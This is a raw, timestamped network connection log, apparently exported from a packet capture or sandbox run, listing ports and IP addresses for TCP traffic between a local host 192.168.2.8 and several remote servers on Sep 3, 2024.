Sep 3, 2024 17:13:12.520648003 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.520648003 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.520723104 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.520740986 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.520752907 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.520764112 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.520776033 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.520818949 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.520818949 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.520843029 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.521020889 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521032095 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521042109 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521054029 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521064997 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.521069050 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521080017 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521089077 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.521091938 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521102905 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521110058 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.521136999 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.521147013 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.521367073 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521378994 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521389008 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521401882 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521425962 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.521425962 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.521460056 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.521509886 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521522999 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521573067 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521581888 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.521588087 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521600008 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521615028 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521627903 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521631002 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.521641970 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521642923 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.521676064 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.521699905 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.521877050 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521891117 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521902084 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521913052 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521933079 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521945953 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.521955013 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521956921 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.521967888 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521975994 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.521981001 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.521995068 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.522007942 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.522011042 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.522036076 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.522036076 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.522255898 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.522316933 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.570554972 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.570594072 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.570609093 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.570628881 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.570643902 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.570657015 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.570677042 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.570683002 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.570734978 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.570768118 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.570890903 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.570904016 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.570916891 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.570930004 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.570941925 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.570961952 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.570961952 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.570961952 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.570990086 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.571170092 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.571188927 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.571202040 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.571217060 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.571230888 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.571243048 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.571250916 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.571250916 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.571250916 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.571257114 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.571274996 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.571278095 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.571316957 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.571316957 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.571408033 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.573754072 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.629230976 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629252911 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629268885 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629296064 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.629317999 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.629350901 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629364967 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629379034 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629395008 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629400969 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.629415989 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.629443884 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.629487038 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629501104 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629514933 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629528999 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629544020 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629544973 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.629544973 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.629559040 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629565001 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.629584074 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.629663944 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.629748106 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629760027 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629769087 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629780054 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629796982 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629806042 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.629806995 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629817009 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629818916 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.629827976 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.629858017 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.629858017 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.629887104 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.630188942 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630199909 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630208969 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630218029 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630228043 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630238056 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630244970 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.630249023 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630259991 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630269051 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630274057 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.630280018 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630285025 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.630314112 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.630330086 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.630580902 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630592108 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630601883 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630611897 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630621910 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630629063 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.630633116 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630650043 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630667925 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.630667925 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.630686998 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.630701065 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.630865097 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630877018 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630889893 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630902052 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630903959 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.630928993 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630942106 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630953074 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.630953074 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.630956888 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630970955 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.630979061 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.630987883 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631007910 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631016970 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631016970 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631026983 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631067038 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631067038 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631545067 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631561041 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631577969 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631597042 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631612062 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631613016 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631614923 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631633043 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631635904 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631635904 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631649017 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631664991 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631670952 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631670952 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631680965 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631696939 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631700993 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631700993 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631716013 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631719112 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631733894 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631747007 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631757021 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631757975 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631773949 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631773949 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631789923 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631805897 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631807089 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631807089 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631828070 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631839991 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631859064 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.631860018 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.631891012 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.632205009 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.632220030 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.632271051 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.632271051 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.777430058 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:12.888129950 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:12.932756901 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:12.937660933 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:13.166754961 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:13.278774977 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:13.411386013 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:13.411499023 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:13.643430948 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:13.648914099 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:13.654361010 CEST	49716	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:13.654737949 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:13.659970045 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:13.659991980 CEST	80	49716	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:13.660037994 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:13.660051107 CEST	49716	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:13.660245895 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:13.666343927 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:13.836678982 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:13.836700916 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:13.836713076 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:13.836724043 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:13.836735010 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:13.836752892 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:13.836781025 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:13.836816072 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:14.025227070 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:14.030291080 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:14.214798927 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:14.278738976 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:14.463332891 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.463443041 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.464725971 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.470021009 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.661904097 CEST	49725	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:14.669560909 CEST	80	49725	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:14.669684887 CEST	49725	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:14.680092096 CEST	49725	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:14.685106993 CEST	80	49725	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:14.714848042 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.714914083 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.714951038 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.714962006 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.714972019 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.715002060 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.715033054 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.715085030 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.715095043 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.715126038 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.715137005 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.715198994 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.715209007 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.715246916 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.715328932 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.715379000 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.715389967 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.715419054 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.715445042 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.719974995 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.720118046 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.720149994 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.720169067 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.720196009 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.720237017 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.720248938 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.720256090 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.720279932 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.861908913 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.861936092 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.861948967 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.861960888 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.861972094 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.861972094 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.861984968 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.862001896 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.862035036 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.862215996 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.862231970 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.862242937 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.862262011 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.862302065 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.862565994 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.862607956 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.862618923 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.862654924 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.862690926 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.863076925 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.863107920 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.863168955 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.863343000 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.863354921 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.863365889 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.863399982 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.863462925 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.863478899 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.863518000 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.863544941 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.864278078 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.864377975 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.864536047 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.864557028 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.864610910 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.864624977 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.864638090 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:14.864677906 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.864692926 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:14.935678959 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:14.940887928 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:15.013319969 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.013341904 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.013358116 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.013411045 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.013442993 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.013653040 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.013674021 CEST	80	49723	185.215.113.16	192.168.2.8
